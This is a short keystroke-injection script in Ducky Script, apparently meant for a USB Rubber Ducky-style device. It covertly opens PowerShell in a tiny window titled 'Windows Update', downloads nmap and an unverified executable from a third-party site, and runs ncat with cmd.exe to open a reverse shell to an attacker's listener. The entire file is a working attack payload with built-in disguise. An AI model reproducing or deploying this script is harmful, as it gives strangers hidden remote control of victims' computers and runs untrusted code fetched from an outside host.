GUI R
DELAY 2000
STRING PowerShell.exe -noe -c “. mode.com con: lines=1 cols=12”
ENTER
DELAY 2000
STRING $Host.UI.RawUI.WindowTitle = “Windows Update”
DELAY 2000
ENTER
DELAY 2000
STRING mkdir <PATH>
ENTER
DELAY 2000
STRING Invoke-WebRequest -Uri https://nmap.org/dist/nmap-7.80-win32.zip -Outfile <PATH>\nc.zip
DELAY 2000
ENTER
DELAY 2000
STRING Invoke-WebRequest -Uri http://pwnpalace.com/download/others/fce642c6-1963-4a0d-bffe-173f43f02329.zip -Outfile <PATH>\unzip.exe
ENTER
DELAY 2000
STRING cd <PATH>
ENTER
DELAY 2000
STRING .\unzip.exe nc.zip
ENTER
DELAY 3000
STRING cd nmap-7.80
ENTER
DELAY 2000
STRING .\ncat.exe <LISTEN_IP> <LISTEN_PORT> -e cmd.exe
DELAY 1000
ENTER
WINDOWS DOWN
